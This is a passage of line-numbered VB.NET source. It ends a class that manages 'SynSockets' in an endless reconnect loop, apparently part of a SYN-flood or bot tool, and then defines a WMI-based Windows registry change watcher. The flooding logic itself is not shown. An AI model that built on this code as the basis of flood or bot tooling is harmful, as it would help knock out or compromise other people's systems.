2252 Next
2253 Me.Sock = Nothing
2254 GoTo Label_0000
2255 Catch
2256 For num = 0 To Me.SynSockets - 1
2257 Try
2258 If Me.Sock(num).Connected Then
2259 Me.Sock(num).Disconnect(False)
2260 End If
2261 Me.Sock(num).Close()
2262 Me.Sock(num) = Nothing
2263 Catch
2264 End Try
2265 Next
2266 GoTo Label_0000
2267 End Try
2268 End Sub
2269 End Class
2270 End Class
2271 Public Class RegistryWatcher
2272 Public MonitorCollection As New Collections.Generic.Dictionary(Of String, Monitor)
2273 Public Event RegistryChanged(ByVal M As Monitor)
2274 Public Enum HKEY_ROOTS As Integer
2275 HKEY_CLASSES_ROOT = 0
2276 HKEY_CURRENT_USER = 1
2277 HKEY_LOCAL_MACHINE = 2
2278 HKEY_USERS = 3
2279 HKEY_CURRENT_CONFIG = 4
2280 End Enum
2281 Public Sub AddWatcher(ByVal Root As HKEY_ROOTS, ByVal Path As String, ByVal ID As String, Optional ByVal Value As String = "")
2282 If MonitorCollection.ContainsKey(ID) = False Then
2283 Dim RegMon As New Monitor(Root, Path, ID, Value)
2284 AddHandler RegMon.Changed, AddressOf OnRegistryChanged
2285 MonitorCollection.Add(ID, RegMon)
2286 End If
2287 End Sub
2288 Public Sub RemoveWatcher(ByVal ID As String)
2289 If MonitorCollection.ContainsKey(ID) = True Then
2290 MonitorCollection(ID).StopWatch()
2291 MonitorCollection.Remove(ID)
2292 End If
2293 End Sub
2294 Private Sub OnRegistryChanged(ByVal M As Monitor)
2295 RaiseEvent RegistryChanged(M)
2296 End Sub
2297 Public Class Monitor
2298 Private mRoot As HKEY_ROOTS
2299 Private mPath As String
2300 Private mID As String
2301 Private mValue As String
2302 Private mStop As Boolean
2303 Public ReadOnly Property Root() As HKEY_ROOTS
2304 Get
2305 Return mRoot
2306 End Get
2307 End Property
2308 Public ReadOnly Property Path() As String
2309 Get
2310 Return mPath
2311 End Get
2312 End Property
2313 Public ReadOnly Property ID() As String
2314 Get
2315 Return mID
2316 End Get
2317 End Property
2318 Public ReadOnly Property Value() As String
2319 Get
2320 Return mValue
2321 End Get
2322 End Property
2323 Public Event Changed(ByVal M As Monitor)
2324 Sub New(ByVal NewRoot As HKEY_ROOTS, ByVal NewPath As String, ByVal NewID As String, ByVal NewValue As String)
2325 mRoot = NewRoot
2326 mPath = NewPath
2327 mID = NewID
2328 mValue = NewValue
2329
2330 Dim T As New Threading.Thread(AddressOf Watcher)
2331 T.Start()
2332 End Sub
2333 Public Sub StopWatch()
2334 mStop = True
2335 End Sub
2336 Private Sub Watcher()
2337 Dim WMIObject As Object
2338 Dim WMIEvent As Object
2339 Dim WMICurrEvent As Object
2340
2341 mPath = Replace(mPath, "\", "\\")
2342
2343 WMIObject = GetObject("winmgmts:\\.\root\default")
2344
2345 If mValue = "" Then
2346 WMIEvent = WMIObject.ExecNotificationQuery(
2347 "SELECT * FROM RegistryKeyChangeEvent WHERE Hive='" &
2348 mRoot.ToString & "' AND " & "KeyPath='" & mPath & "'")
2349 Else
2350 WMIEvent = WMIObject.ExecNotificationQuery(
2351 "SELECT * FROM RegistryValueChangeEvent WHERE Hive='" &
2352 mRoot.ToString & "' AND " & "KeyPath='" & mPath & "' AND ValueName='" & mValue & "'")
2353 End If
2354
2355 Do
2356 Try
2357 If mStop = True Then
2358 mStop = False
2359 Exit Sub
2360 End If
2361 WMICurrEvent = WMIEvent.NextEvent(500)
2362 RaiseEvent Changed(Me)
2363 Catch ex As Exception
2364 End Try
2365 Loop
2366 End Sub
2367 End Class
2368 End Class
2369#End Region